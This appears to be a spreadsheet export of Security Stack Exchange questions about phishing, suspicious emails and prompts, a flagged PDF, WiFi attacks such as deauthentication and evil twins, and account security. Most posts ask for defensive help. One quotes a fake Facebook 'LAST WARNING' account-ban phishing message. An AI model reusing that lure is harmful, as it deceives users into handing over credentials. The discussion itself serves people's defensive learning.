    <t>&lt;p&gt;I downloaded and then opened a PDF file in Windows in Acrobat reader. The PDF looked off and I scanned the file with Virus Total. The results were:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Avast: PDF:PhishingX-gen [Phish]
 AVG: PDF:PhishingX-gen [Phish]
 Avira(no cloud): HTML/Malicious.PDF.Gen2
 Cynet: Malicious (score: 99)
 Cyren:URL/Phish.AEM3.gen!Eldorado
 F-Secure: Malware.HTML/Malicious.PDF.Gen2
 Fortinet: PDF/Phishing.A!tr
 Google: Detected
 Ikarus: Trojan.PDF.Phishing
 McAfee-GW-Edition: BehavesLike.PDF.Suspicious.db
 Sangfor Engine Zero: Malware.Generic-HTML.Save.ma33
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;I ran MalwareBytes (free version) and Norton. Didn't get any positives back. However I am concerned since I did open the file in Acrobat Reader, if the file installed some form of malware&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;&lt;p&gt;What other anti-virus scanners should I use to specifically scan for this type of malware&lt;/p&gt;
 &lt;/li&gt;
 &lt;li&gt;&lt;p&gt;This is listed as a phishing/Trojan PDF. Does it install a Trojan when I open the PDF?&lt;/p&gt;
 &lt;/li&gt;
 &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;malware&gt;&lt;windows&gt;&lt;pdf&gt;&lt;adobe&gt;</t>
  </si>
  <si>
    <t>Guessable oauth client id and phishing</t>
  </si>
  <si>
    <t>&lt;p&gt;OAuth manual advises that the client ID should not be easily guessable to decrease phishing attacks. &lt;a href="https://www.oauth.com/oauth2-servers/client-registration/client-id-secret/" rel="nofollow noreferrer"&gt;https://www.oauth.com/oauth2-servers/client-registration/client-id-secret/&lt;/a&gt;
 Is it still the case when PKCE is used and auth server redirects only to allowed urls?
 In what cases I might need to change client id for existing app?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;phishing&gt;&lt;oauth&gt;</t>
  </si>
  <si>
    <t>Android update phone number, "To continue, first verify it's you"</t>
  </si>
  <si>
    <t>&lt;p&gt;I was minding my own business, didn't change phone, password, or diet. Then on 3 November 2017 a popup asks for my google password. Is this foul play or just bad googly manners? Should I comply, ignore, or panic?&lt;/p&gt;
 &lt;p&gt;This question may be similar to the one about the en masse &lt;a href="https://security.stackexchange.com/q/152252/20266"&gt;Google verification request&lt;/a&gt; last February. I thought it might be useful to ask a new question with new verbatim text from the message for search purposes.&lt;/p&gt;
 &lt;p&gt;I just received this notice on my Samsung S4 Active with Android today, identified by a wrench icon (not shown) in the status bar. It said something about updating my phone number (also not shown).&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Google&lt;/p&gt;
  &lt;p&gt;To continue, first verify it's you&lt;/p&gt;
  &lt;p&gt;Enter your password&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/Dcrmn.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/Dcrmnl.png" alt="Google sign-in. &amp;quot;To continue, first verify it&amp;#39;s you&amp;quot;"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Naturally, an unexpected request for password is cause for concern. When I long-push the home button I see the app identified with a googly logo.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/9kasN.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/9kasNm.png" alt="enter image description here"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;The &lt;a href="https://security.stackexchange.com/a/152322/20266"&gt;answer from @LieRyan&lt;/a&gt; seems reasonable "...don't sign in on the password prompt on the notification bar. Instead, go to one of the Google Apps or System settings and trigger the login dialog from there." But nothing I've tried has triggered a login dialog. E.g. Inbox works without a new login.&lt;/p&gt;
 &lt;p&gt;My question is, how can I determine whether this is a &lt;strong&gt;phishing request&lt;/strong&gt;? I assume the logo on the app can be spoofed by some app I don't remember installing.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;android&gt;&lt;google&gt;&lt;phishing&gt;&lt;account-security&gt;</t>
  </si>
  <si>
    <t>What is a AUTH-KEY in the security of the computers?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm studying security in computers and in particular the URL Spoofing. I understand that a form of URL spoofing is phishing. Then I read that a countermeasure against phishing is the authentication key.
 But what is not well hocapito autenticcation key.&lt;/p&gt;
 &lt;p&gt;On the notes I read:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;The key contains a seed related to users, a timer, a secret symmetric key and a counter.
  There is a timer on the server instead, the same symmetric key is a list of seed -related utilities and also a counter for each user.&lt;/p&gt;
  &lt;p&gt;When the user clicks the button on the key, it generates an &lt;strong&gt;HMAC(Seed||K||Timer||Counter)&lt;/strong&gt; that is generated on the server in the same way: if there is a match, access is granted.&lt;/p&gt;
  &lt;p&gt;Clearly, the timer will not be synchronized perfectly, and then the server will generate some codes HMAC with some timer values ‚Äã‚Äã(depending on the gap between the user and the server timer) and will look for the matching among those.&lt;/p&gt;
  &lt;p&gt;Each click of the user is recorded by the counter and thus the two are synchronized counter (between server and key). This causes an old code can no longer be used (the counter does not match).&lt;/p&gt;
  &lt;p&gt;The key does not work if the opponent is particularly noticed and make a session hijacking that is the data you just entered on the phishing site is immediately re-shipped to the actual site of the bank.&lt;/p&gt;
  &lt;p&gt;It's like a man in the middle, the opponent does an intermediary with its "fake" pages between the bank and the user. It is also for this reason that before carrying out of some significance is often request another password.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;The auth-key is a key (consisting of seed, timers, counters and secret symmetric key), which possesses only the client? 
 What is meant by seed? And the counter is related to what? 
 What is a HMAC? How can it be match if the key is secret? &lt;/p&gt;
 &lt;p&gt;I understood very little. Someone would know explain it in a simple way? Or if there are websites where this subject is treated in a more comprehensive and easy?&lt;/p&gt;
 &lt;p&gt;I read the Wikipedia page, but I have not found much more.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;physical&gt;&lt;hmac&gt;&lt;spoofing&gt;</t>
  </si>
  <si>
    <t>Is Wifi Penetration Testing Dead?</t>
  </si>
  <si>
    <t>&lt;p&gt;&amp;quot;I hack your Wifi in 5 Minutes&amp;quot; still seems to be a hot topic on youtube in 2023, atleast on beginner channels like David Bombal. However, is there still any real world application? Even before the advent of WPA3?&lt;/p&gt;
 &lt;p&gt;Handshake-Capture + Password Cracking: What company hires an expensive pentester for their Wifi network and uses crackable passwords? Not even my Non-IT-Friends use crackable passwords...&lt;/p&gt;
 &lt;p&gt;WPS-Attacks and a multitude AP DoS Exploits: Works on hardware from the stone age...&lt;/p&gt;
 &lt;p&gt;KRACK &amp;amp; FRAG: No public exploits available and even if they were.. they dont seem very dangerous.&lt;/p&gt;
 &lt;p&gt;Rogue APs / Evil Twins: For a long time this was supposed to be the only practical way to attack Wifi networks. But this seems to be completely useless nowadays aswell. Not even Deauth attacks work on halfway modern hardware. Even cheap consumer grade Routers/APs you get for &amp;quot;free&amp;quot; from your ISP are resistant to deauth attacks. And that is WITHOUT PMF.. Sometimes i can deauth some old/cheap devices but my Samsung S22 Ultra or my updated Windows 10 Machine never gets disconnected. Airepleay Broadcast, Airepleay Targeted, MDK3, MDK4, Scapy etc. nothing works here. And yes, i triple checked interface channel, mode, airmon kill etc. I also tried 4 different modern Adapters which all support 5 GHz 802.11ac. I even ran them in parallel and deauthed 2.4Ghz channels and 5Ghz at the same time. I also used airgeddons DoS Pursuit Mode, even tho the APs didnt channel hop to evade the attack. On my Routers/APs from 2010 i can deauth all devices all day long, but not on any modern hardware.
 And even if i can reliably disconnect clients, none of them are are still dumb enough to immediately switch to an open Access Point with the same SSID... so you could try some Mana Attack variant and hope to find an open Wifi in the clients PNL and let him connect.. and then phish them while they are connected to &amp;quot;Starbucks Free Wifi&amp;quot; while sitting at work :-D.&lt;/p&gt;
 &lt;p&gt;Am i missing something here? I would rather sell my clients the 10th Network Pentest/Phishing Training Campaign/Physical Assessment than a Wifi Pentest.&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wifi&gt;&lt;penetration-test&gt;&lt;deauth-attack&gt;&lt;wifite&gt;</t>
  </si>
  <si>
    <t>Shared Office Network Security - VPNs, Firewalls, and systems</t>
  </si>
  <si>
    <t>&lt;p&gt;First, let me premise this post with the fact that I am completely new to network security. I have done a fair bit of reading up, but I am certainly by no means a professional. If anything I say here is wrong or stupid, please, &lt;em&gt;please,&lt;/em&gt; correct me. &lt;/p&gt;
 &lt;p&gt;Anyway, largely because I have enough patience to install a printer driver, and have a VPN set up on my personal computer, I have been selected to set up all of the IT systems at my workplace... We are currently operating in a shared office space. The fact that the password for the wifi provided by the office space is one of the top 5 most-used passwords in 'l33t' format has me greatly worried about the security posture of the office space as a whole, and therefore my company's NETSEC with it. I understand that the high turnover rate in this office space drives the need for a simple password, but to me it is precisely that same high turnover that needs to be taken into account when devising a network security strategy. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;So, question 1) Am I right in being worried that this is incredibly insecure? Wouldn't it take 1/10 of a second to get the network password, and then open up a whole host of vectors for attack?&lt;/strong&gt; I feel as though packet sniffing, and ARP spoofing should be relatively easy to accomplish, even by someone who has little to no experience such as myself. &lt;/p&gt;
 &lt;p&gt;Some more context to work with: we do not currently have the need for a dedicated server, and probably won't need to for the next two years or so. Due to the size of the company at the moment, and plans for growth, this has been deemed an unnecessary cost. Basically until then, I am hoping to implement a few simple security measures. I would like to install third-party firmware onto a wifi router which would be plugged into the office space's network. I would then use that router to connect to a commercial VPN provider. Our office computers would connect to that router alone. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question 2) Is this a realistic answer to the insecurity of the office space's wifi network? Am I wrong in believing that this would protect our data from being visible to running something like Wireshark on the LAN?&lt;/strong&gt; &lt;/p&gt;
 &lt;p&gt;From my understanding of it, and if I were to do this, we would lose access to the firewall that the office space currently has on their network (I'm not even certain they have one, but that is a gripe for another discussion). Therefore, I would have to ensure that the VPN traffic is protected in that regard. To address this, I want to install a business antivirus software on our IT systems (with an admin console and all that jazz) that has a firewall integrated with it. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question 3) Bearing in mind the answers to questions 1 and 2, is implementing such a host-based firewall solution from one of these antivirus softwares an intelligent manner of dealing with this problem?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;As I mentioned, the size of our company precludes it from having a dedicated server through which activity could be monitored by someone more competent than me. I think we will have to rely on the AV and its firewall, as well as a lot of education on what phishing attempts look like, why we would be implementing these measures, etc. &lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Question 4) I know this is vague, but what am I forgetting? If you read my long-winded post, you have about as much information as I do - so what else would you do if you were me? Or would you do approach this problem from a totally different angle?&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;Thank you for your help! And sorry for the novel... &lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;network&gt;&lt;firewalls&gt;&lt;wifi&gt;&lt;vpn&gt;</t>
  </si>
  <si>
    <t>How do botnets deliver spam?</t>
  </si>
  <si>
    <t>&lt;p&gt;I can't seem to find the answer to this question.
 I read that botnet bots are used as email relays (they have smtp servers installed). &lt;/p&gt;
 &lt;p&gt;Wikipedia on Open mail relay:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;"(...)Internet initiatives to close open relays have ultimately missed
  their intended purpose because spammers have created distributed
  botnets of zombie computers that contain malware with mail relaying
  capability. The number of clients under spammers' control is now so
  great that previous anti-spam countermeasures that focused on closing
  open relays are no longer effective."&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;I also read that botnets are used to cover tracks and bypass black-lists of spam.This brings me many questions:&lt;/p&gt;
 &lt;ol&gt;
 &lt;li&gt;Do botnets have email domains compromised?&lt;/li&gt;
 &lt;li&gt;How do botnets deliver email with fake source addresses?(without
 email trusted email servers compromissed)&lt;/li&gt;
 &lt;li&gt;Nowadays, it is hard to spam known email companies (like gmail)
 because they do not accept telnet connections and fake source
 addresses. It requires authentication. How do botnets and spammers
 deal with this?&lt;/li&gt;
 &lt;li&gt;If bots are relays, don't that mean that they can only deliver spam
 to other bots. Does this make any sense? This won't even affect
 users.&lt;/li&gt;
 &lt;li&gt;How can botnets bypass domain blacklisting if they need known
 accounts and therefore domains to send on source addresses?&lt;/li&gt;
 &lt;/ol&gt;
 &lt;p&gt;I also read a pdf from this link:
 &lt;a href="https://www.damballa.com/downloads/r_pubs/WP_Botnet_Communications_Primer.pdf" rel="nofollow"&gt;https://www.damballa.com/downloads/r_pubs/WP_Botnet_Communications_Primer.pdf&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;It states this about domain flux:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Domain Wildcarding abuses native DNS functionality to wildcard (e.g.,
  *) a higher domain such that all FQDN‚Äôs point to the same IP address. For example, *.damballa.com could encapsulate both
  mypc.atl.damballa.com and myserver.damballa.com. &lt;strong&gt;This technique is
  most commonly associated with botnets that deliver spam and phishing
  content ‚Äì whereby the wildcarded information that appears random (e.g.
  ‚Äúasdkjlkwer‚Äù of asdkjlkwer.atl.damballa) is used by the botnet
  operator to uniquely identify a victim, track success using various
  delivery techniques, and bypass anti-spam technologies.&lt;/strong&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Can anyone explain me the bold sentences? Who is the victim? The compromised machine or the spam target? Ho does domain wildcarding help on spam and phishing?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;spam&gt;&lt;botnet&gt;&lt;email-spoofing&gt;</t>
  </si>
  <si>
    <t>Possible public/private identity recovery after compromise without a centeral authority?</t>
  </si>
  <si>
    <t>&lt;p&gt;I‚Äôve been thinking about P2P systems using asymmetric keys and wondering if there is anyway to recover an identity in the event it was compromised using some kind of web-of-trust. &lt;/p&gt;
 &lt;p&gt;This seems to be a large issue compared to a regular system (using a central authority) that can remove the intruder's access and restore control of the account to the real owner (Digicert, facebook, twitter, etc...).&lt;/p&gt;
 &lt;h2&gt;Possible Peer-run Certificate Authority Design&lt;/h2&gt;
 &lt;p&gt;What if a master key pair was generated by a user and then used to create a subkey. Then using 16+ random bytes the master keys private component could be encrypted. The public and encrypted private key parts can be stored on the network publicly. The public part of this master key would be the root identity for that user.&lt;/p&gt;
 &lt;p&gt;The owner could choose 5+ nodes on the network (friends?) to store parts of the passphrase used to encrypt the master key private component and then erase it's knowledge of those bytes. &lt;/p&gt;
 &lt;p&gt;The subkey would be the active user identity (with it's own AES password protecting the private part). Should this client get phished, forget their password, or someone steal their sub-key private component, we could use the peers to restore the master key and revoke this subkey. Then we could generate and sign a new subkey.&lt;/p&gt;
 &lt;p&gt;I'm not sure how this would work other than the client sending a request to each node and them verifying the client though some out-of-bands way (phone call? Text?) before sending their part of the master key password.&lt;/p&gt;
 &lt;p&gt;Would this work? Are their any existing solutions to this problem?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;authentication&gt;&lt;public-key-infrastructure&gt;&lt;key-management&gt;&lt;trust&gt;&lt;p2p&gt;</t>
  </si>
  <si>
    <t>My email is listed as recovery email for an unknown Google account</t>
  </si>
  <si>
    <t>&lt;p&gt;I just received a &lt;em&gt;"New sign-in"&lt;/em&gt; notification email from Google, saying&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;Hi &lt;code&gt;UNKONWN_PERSON&lt;/code&gt;,&lt;/p&gt;
  &lt;p&gt;Your Google Account &lt;code&gt;UNKONWN_ACCOUNT@gmail.com&lt;/code&gt; was just used to sign in from &lt;code&gt;SOME_BROWSER&lt;/code&gt; on &lt;code&gt;SOME_OS&lt;/code&gt;&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Where &lt;code&gt;UNKONWN_PERSON&lt;/code&gt; and &lt;code&gt;UNKONWN_ACCOUNT&lt;/code&gt; are total strangers to me. They have no resemblance to mine and even belong to a different culture.&lt;/p&gt;
 &lt;p&gt;The email also explains:&lt;/p&gt;
 &lt;blockquote&gt;
  &lt;p&gt;You received this message because &lt;code&gt;MY_EMAIL_ADDR&lt;/code&gt; is listed as the recovery email for &lt;code&gt;UNKONWN_ACCOUNT@gmail.com&lt;/code&gt;. If &lt;code&gt;UNKONWN_ACCOUNT@gmail.com&lt;/code&gt; is not your Google Account, &lt;a href="http://www.example.com" rel="noreferrer"&gt;click here to disconnect&lt;/a&gt; from that account and stop receiving emails.&lt;/p&gt;
 &lt;/blockquote&gt;
 &lt;p&gt;Where &lt;code&gt;MY_EMAIL_ADDR&lt;/code&gt; is my email address, to which the message was sent.&lt;/p&gt;
 &lt;p&gt;While clicking the disconnect link seems the obvious action, I am not sure that this is enough. It seems unlikely that my address was added as recovery email by mistake, so I am wondering if &lt;code&gt;UNKONWN_PERSON&lt;/code&gt; or someone else had any malicious intent&lt;/p&gt;
 &lt;p&gt;The disconnect link doesn't look like a phishing one, it is in this form:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;https://accounts.google.com/AccountDisavow?adt=SOME_HASH
 &lt;/code&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;google&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How to react on a message about a pending account ban on Facebook?</t>
  </si>
  <si>
    <t>&lt;p&gt;Are you getting this message on chat?&lt;/p&gt;
 &lt;blockquote&gt;
 &lt;p&gt;LAST WARNING : Your account is reported to have violated the policies that are considered annoying or insulting Facebook users. Until we system will disable your account within 24 hours if you do not do the reconfirmation.&lt;/p&gt;
 &lt;p&gt;If you still want to use Facebook, Please confirm your account below:&lt;/p&gt;
 &lt;p&gt;[redacted]-confirm-security-user.de.lv/&lt;/p&gt;
 &lt;p&gt;Thanks.&lt;/p&gt;
 &lt;p&gt;The Facebook Team&lt;/p&gt;
 &lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;spam&gt;&lt;social-engineering&gt;&lt;phishing&gt;</t>
  </si>
  <si>
    <t>How does this scam email from a seemingly legit domain work?</t>
  </si>
  <si>
    <t>&lt;p&gt;I received a strange email from &lt;code&gt;security@facebookmail.com&lt;/code&gt;. Sources on the internet seem to state that this is a Facebook-owned domain but I know the email is not legit because they do not address me by my first name, but instead by my email address. Also, I do not have a Facebook account with this particular email address.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/l3Xk1.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/l3Xk1.png" alt="Email screenshot" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Scam emails like this typically include links to malicious websites. However, this one does not. The main action button of the email is a link to send an email to &lt;code&gt;unrecognized.facebook.activity@gmail.com&lt;/code&gt;, which is obviously not a legit Facebook email address. All of the other buttons and links in the email also have a &lt;code&gt;mailto:&lt;/code&gt; link to the same address, just with a different Subject.&lt;/p&gt;
 &lt;p&gt;If it matters, the email client I was using is Outlook.com.&lt;/p&gt;
 &lt;hr /&gt;
 &lt;p&gt;I have 2 questions regarding this.&lt;/p&gt;
 &lt;h3&gt;1. How did it pass &lt;a href="https://security.stackexchange.com/a/204771/124045"&gt;SPF, DKIM and DMARC&lt;/a&gt;?&lt;/h3&gt;
 &lt;p&gt;I know that this question was asked before:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://security.stackexchange.com/questions/257417/how-did-this-paypal-spoof-email-pass-spf-dkim-and-dmarc"&gt;How did this paypal spoof email pass SPF, DKIM and DMARC&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://security.stackexchange.com/questions/209886/how-did-a-phishing-email-pass-spf-dkim-and-dmarc"&gt;How did a phishing email pass SPF, DKIM and DMARC?&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;However, in the first case, it was an actual legitimate email. In the second one, the address was &lt;code&gt;From: Bank Of America &amp;lt;peopledevelopment@uber.com&amp;gt;&lt;/code&gt;, so there was no actual spoofing. In my case, it is &lt;code&gt;facebook &amp;lt;security@facebookmail.com&amp;gt;&lt;/code&gt;. There are no special characters.&lt;/p&gt;
 &lt;h3&gt;2. How does the scam work?&lt;/h3&gt;
 &lt;p&gt;It does not seem that clicking the links will cause anything malicious, since it will just create a new email in the receiver‚Äôs email client.&lt;/p&gt;
 &lt;p&gt;I found a similar question: &lt;a href="https://security.stackexchange.com/questions/220631/trying-to-understand-the-point-of-this-scam-email"&gt;Trying to understand the point of this scam email&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Over there, the answers mention that it might be a way to generate the email addresses of people who do click the buttons. I do not see how this might apply to my example because the link does not actually send the reply email, but just creates it locally on the email client.&lt;/p&gt;
 &lt;p&gt;For comparison, this is what I see when I inspect the main button:&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/80F0D.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/80F0D.png" alt="Email scam button inspect" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;hr /&gt;
 &lt;p&gt;I tried to use the View Message Source feature on my email client, and found something interesting:&lt;/p&gt;
 &lt;pre&gt;&lt;code&gt;Received: from AM4PR0202MB2852.eurprd02.prod.outlook.com (2603:10a6:200:8e::8)
  by AS8PR02MB6583.eurprd02.prod.outlook.com with HTTPS; Mon, 17 Jan 2022
  21:06:19 +0000
 Received: from MWHPR12CA0043.namprd12.prod.outlook.com (2603:10b6:301:2::29)
  by AM4PR0202MB2852.eurprd02.prod.outlook.com (2603:10a6:200:8e::8) with
  Microsoft SMTP Server (version=TLS1_2,
  cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.4888.9; Mon, 17 Jan
  2022 21:06:15 +0000
 Received: from CO1NAM11FT028.eop-nam11.prod.protection.outlook.com
  (2603:10b6:301:2:cafe::f4) by MWHPR12CA0043.outlook.office365.com
  (2603:10b6:301:2::29) with Microsoft SMTP Server (version=TLS1_2,
  cipher=TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384) id 15.20.4888.10 via Frontend
  Transport; Mon, 17 Jan 2022 21:06:14 +0000
 Authentication-Results: spf=fail (sender IP is 31.192.237.146)
  smtp.mailfrom=facebookmail.com; dkim=none (message not signed)
  header.d=none;dmarc=fail action=oreject
  header.from=facebookmail.com;compauth=fail reason=000
 Received-SPF: Fail (protection.outlook.com: domain of facebookmail.com does
  not designate 31.192.237.146 as permitted sender)
  receiver=protection.outlook.com; client-ip=31.192.237.146; helo=brave19.com;
 Received: from brave19.com (31.192.237.146) by
  CO1NAM11FT028.mail.protection.outlook.com (10.13.175.214) with Microsoft SMTP
  Server id 15.20.4888.9 via Frontend Transport; Mon, 17 Jan 2022 21:06:13
  +0000
 &lt;/code&gt;&lt;/pre&gt;
 &lt;p&gt;It seems that the email failed the SPF check? If so, how did the email end up in my inbox?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;email&gt;&lt;phishing&gt;&lt;email-spoofing&gt;&lt;scam&gt;&lt;spf&gt;</t>
  </si>
  <si>
    <t>Are there different characters that appear exactly the same in browsers' url lines?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've heard of phishing scams using misspellings of urls. But can a url look &lt;strong&gt;&lt;em&gt;exactly&lt;/em&gt;&lt;/strong&gt; the same as a legit one in the address bar, while actually being a different url?&lt;/p&gt;</t>
  </si>
  <si>
    <t>How can clicking a link in a Facebook users news feed compromise their account</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been confused about how it is possible to compromise a Facebook user's account simply if that user clicks a link. Recently a friend of mine on Facebook posted a series of links to what appeared to be some kind of Phishing scam. "99% of people couldn't watch this for more that 1 minute!!!" etc etc. We've all seen it. Clearly their account had been compromised and some malicious software or human was posting this content on their behalf.&lt;/p&gt;
 &lt;p&gt;Reading through some of the threads here I came across this : &lt;a href="https://security.stackexchange.com/questions/52115/dont-understand-how-my-mums-gmail-account-was-hacked"&gt;Don&amp;#39;t understand how my mum&amp;#39;s Gmail account was hacked&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;This seems like a similar scenario but I've been told reliably by my friend that they didn't input any credentials recently to sites that were anything other than Facebook. Of course we all know that a good Phishing site will indeed be indistinguishable from the site it is trying to capture details of users from.&lt;/p&gt;
 &lt;p&gt;So my question is two fold:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;How can clicking a link and browsing to a page, without inputting any credentials compromise your account.&lt;/li&gt;
 &lt;li&gt;How can sites that do get control of your account by asking for credentials through what appears to be a legitimate site still appear to have the right URL.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;Thanks everyone! I'm very interested to hear any response.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Is someone trying to break in my WIFI router?</t>
  </si>
  <si>
    <t>&lt;p&gt;We have a WIFI router with SSID: "dummyssid" with our own WPA2 password. Today unexpectedly, another WIFI SSID was available in the WIFI scan list with exactly same as of our SSID: "dummyssid" &lt;strong&gt;but without any password.&lt;/strong&gt; Just at that time internet on our devices, like laptop and mobile phones, stopped working. I suppose because there were exactly same WIFI SSID's in the scan list and our laptop/mobile phone is unable to decide which one to use?&lt;/p&gt;
 &lt;p&gt;I thought my WIFI router is having some issues. &lt;strong&gt;So I disconnected from power it but still that ambiguous SSID was available in WIFI scan list.&lt;/strong&gt; I tried to connect with that ambiguous SSID, then I tried to access the router web page of that ambiguous WIFI. In that page it asked me for my WIFI password. I didn't entered anything there. Leaving everything as it is. After 30 minutes or so, that ambiguous WIFI is no more visible in list and our internet is working fine again.&lt;/p&gt;
 &lt;p&gt;This is the page that was showed to me when I accessed router page of that ambiguous WIFI.
 &lt;a href="https://i.stack.imgur.com/EWNT8.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/EWNT8.png" alt="ambiguous wifi login"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;Do you think someone is trying to get our WIFI password by creating an ambiguous WIFI device and pushing us to enter our WIFI password? If that's so, how do you think we can prevent it?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;wifi&gt;&lt;phishing&gt;&lt;router&gt;&lt;evil-twin&gt;</t>
  </si>
  <si>
    <t>Browser passwords used on multiple domains?</t>
  </si>
  <si>
    <t>&lt;p&gt;I have 100 domains with authentication backed by the same LDAP database. There is a single-sign on, but it's not implemented with OAuth. That is to say, per user, each domain accepts the same user/password credential for authentication.&lt;/p&gt;
 &lt;p&gt;Under the normal workflow with something like Chrome, the user would be forced to copy-paste that user/password into multiple sites, creating multiple entries in the browser's password-manager. Each time, the burden is on the user to check to make sure they're copying the password into a "safe" site. On password-change, it's the user's job to update the password on each site &lt;/p&gt;
 &lt;p&gt;After having entered in the same username and password on 99 sites, the hundreth could reasonably be a bad site, and it's largely a numbers game. I would like to have the ability to establish a list of sites for the credentials to be valid for early on.&lt;/p&gt;
 &lt;p&gt;This would mean after the user logs into to a site once, they would no longer know what sites they can apply those credentials too.&lt;/p&gt;
 &lt;p&gt;What is the best way to secure a client against phishing attacks where single-domain OAuth is not a solution and a login is shared across sites?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;passwords&gt;&lt;password-management&gt;&lt;chrome&gt;</t>
  </si>
  <si>
    <t>What are the ways to identify a DNS cache poisoning attack?</t>
  </si>
  <si>
    <t>&lt;p&gt;Consider a scenario: (at victims end) in DNS cache poisoning attack. When the victim will go to a website (eg: gmail.com), he will be taken to some other phishy website. Now here the URL remains the same, so is there any way to identify that the website he/she is visiting is fake?&lt;/p&gt;</t>
  </si>
  <si>
    <t>&lt;man-in-the-middle&gt;&lt;arp-spoofing&gt;&lt;url-redirection&gt;&lt;dns-spoofing&gt;</t>
  </si>
  <si>
    <t>Disturbing/suspicious Google notifications about account recovery and password change</t>
  </si>
  <si>
    <t>&lt;p&gt;This is similar to &lt;a href="https://security.stackexchange.com/questions/239297/is-this-google-mail-from-gaia-bounces-google-com-legit"&gt;Is this Google mail from gaia.bounces.google.com legit?&lt;/a&gt;, except a) I have nothing in my life related to the language used (Indonesian), b) these are different notifications (and more than one: an account recovery notif., and then a password change notif. (came twice, might also happen with legit ones), all within 1 minute), and c) finally: the recovery addresses mentioned are &lt;em&gt;not&lt;/em&gt; mine. (But the To-address is indeed my main account address.)&lt;/p&gt;
 &lt;p&gt;I'd dismiss it as junk, however:&lt;/p&gt;
 &lt;ul&gt;
 &lt;li&gt;All the hosts in the mail route seem the be the usual legit Google servers.&lt;/li&gt;
 &lt;li&gt;All the URLs in the mail point to Google, too.&lt;/li&gt;
 &lt;li&gt;GMail didn't flag it as suspicious.&lt;/li&gt;
 &lt;li&gt;Everything seem to be like with the legit notifications. (It was TLS-encrypted, too.)&lt;/li&gt;
 &lt;li&gt;Also checked the entire original email text (via &amp;quot;Show original&amp;quot;), didn't see anything off.&lt;/li&gt;
 &lt;/ul&gt;
 &lt;p&gt;So, it's quite alarming, or at least puzzling to me, and the accepted answer at the other question doesn't apply here, unfortunately.&lt;/p&gt;
 &lt;p&gt;&lt;a href="https://i.stack.imgur.com/b618W.png" rel="noreferrer"&gt;&lt;img src="https://i.stack.imgur.com/b618W.png" alt="" /&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;(In my G. account's security activity there are no matching entries, which is good. But FWIW, it doesn't seem to show my own earlier ones either, so who knows. I've changed my password anew, and noticed that the &amp;quot;real&amp;quot; notification didn't actually mention the recovery addresses.)&lt;/p&gt;
 &lt;p&gt;So, what is this exactly? And how does it happen, especially if not legit?&lt;/p&gt;
 &lt;p&gt;And if a fraud, then what's the point? (Doesn't make sense as phishing: there's no hook.)
 I can think of maybe a botched phishing attempt, or even a lead to a subsequent targeted social engineering attack, but what's with all the healthy-looking email metadata, regardless?&lt;/p&gt;
